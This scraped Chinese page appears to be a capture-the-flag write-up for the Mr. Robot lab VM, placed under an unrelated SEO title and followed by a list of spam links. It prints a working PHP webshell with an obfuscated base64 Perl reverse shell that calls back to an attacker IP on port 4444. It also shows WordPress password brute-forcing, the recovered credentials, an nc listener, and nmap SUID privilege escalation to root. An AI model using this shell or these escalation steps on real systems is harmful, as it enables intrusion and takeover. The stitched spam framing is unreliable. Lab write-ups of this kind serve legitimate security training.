当前位置: 首页 > news >正文

上海模板建站源码wordpress加载完再显示图片

上海模板建站源码,wordpress加载完再显示图片,wordpress 怎样安装,自己做的网站不备案不能访问吗一、信息收集 1.访问地址 没啥信息#xff0c;尝试扫下目录 2.目录扫描 key1 发现有wp-admin/和robots.txt robots.txt里面还拿到了一个密码字典#xff0c;猜测是爆破wp的网站账号密码的 3.访问wp-admin/ ┌──(root#x1f480;kali)-[~/桌面] └─# sort -u fsoci…一、信息收集 1.访问地址 没啥信息尝试扫下目录 2.目录扫描 key1 发现有wp-admin/和robots.txt robots.txt里面还拿到了一个密码字典猜测是爆破wp的网站账号密码的 3.访问wp-admin/ ┌──(rootkali)-[~/桌面] └─# sort -u fsocity.dic wp.txt 利用burp爆破发现账号和密码 账号elliot 密码ER28-0652二、漏洞利用 1.修改404.php 写入webshell 木马 ?php function which($pr) { $path execute(which $pr); return ($path ? $path : $pr); } function execute($cfe) { $res ; if ($cfe) { if(function_exists(exec)) { exec($cfe,$res); $res join(\n,$res); } elseif(function_exists(shell_exec)) { $res shell_exec($cfe); } elseif(function_exists(system)) { ob_start(); system($cfe); $res ob_get_contents(); ob_end_clean(); } elseif(function_exists(passthru)) { ob_start(); passthru($cfe); $res ob_get_contents(); ob_end_clean(); } elseif(is_resource($f popen($cfe,r))) { $res ; while(!feof($f)) { $res . fread($f,1024); } pclose($f); } } return $res; } function cf($fname,$text){ if($fpfopen($fname,w)) { fputs($fp,base64_decode($text)); fclose($fp); } } $yourip 192.168.103.129; $yourport 4444; $usedb array(perlperl,cc); $back_connectIyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw; cf(/tmp/.bc,$back_connect); $res execute(which(perl). /tmp/.bc $yourip $yourport ); ? 2.反弹shell ┌──(rootkali)-[~/桌面] └─# nc -lvvp 4444 再访问404.php就可以进行反弹shell了 http://192.168.103.183/404.phppython3 -c import pty; pty.spawn(/bin/bash) #交互式shell 3.拿key2 在robot目录下有key2但是直接访问没权限 但是有一个md5加密的密码所以猜测md5解密以后 可以利用ssh远程登录 MD5免费在线解密破解_MD5在线加密-SOMD5 密码 abcdefghijklmnopqrstuvwxyz 三、SUID提权 1.查看只有SUID的二进制可执行文件 find / -user root -perm -4000 -print 2/dev/null2.已知的可用来提权的linux可行性的文件列表如下 nmap、Vim、find、bash、more、less、Nano、cp3.进入namp可交互式模式仅限2.02-5.21版本 nmap --interactive4.提权root ! sh1.nmap交互式 1.进入namp可交互式模式仅限2.02-5.21版本 nmap --interactive2.提权root ! sh2.key3
http://www.hkea.cn/news/14486356/

相关文章:

  • 衡水企业网站网络教学平台昆明理工大学
  • 兰州市政建设集团办公网站wordpress主题改中文
  • 手机微信网站开发教程网页游戏传奇类
  • 创建一个网站多少钱广东圆心科技网站开发网站模板设计
  • 网站开发入门培训云制造网站
  • 正能量网站网址大全百度seo在线优化
  • 建设公司网站需要钱吗新开传奇网站手机版
  • 评价一个网站推广方式怎么写
  • 前端开发可以做网站赚钱吗wordpress 静态商店
  • 国内外网站开发有哪些技术网站开发 设计文档
  • 贝斯特专业网站网站网页设计引言
  • 设计精美的国外网站兰州新区装修公司哪家好
  • 电商网站设计流程图网络广告发布的形式主要包括
  • 交三百能在网站上找兼职做的网站建设淘宝类目
  • 5118站长工具箱手机应用软件开发培训班
  • 龙岗微网站建设福永自适应网站建设
  • 远程教育网站开发松江网站建设培训费用
  • 深圳做网站的公司排行织梦网站内容自动更新
  • 网站建设问题及对策做网站就是做app
  • 手机网站有什么区别吗如何做网站赚
  • iis wordpress多站点网站的企业特色展示
  • 用什么软件做网站最快和coser做网站
  • 网站开发老是弹广告qq是什么公司开发的
  • 婚庆网站设计搜索引擎优化哪些方面
  • 菏泽市住房和建设局网站wordpress 分类目录 丢失
  • 山西省建设厅入晋备案网站多用户自助建站系统
  • 权重高的博客网站wordpress修改中文字体
  • 宁波网站建设果核域名有永久的吗
  • 设计开发网站wordpress 禁止收录
  • 中信建设有限公司简介丹东seo优化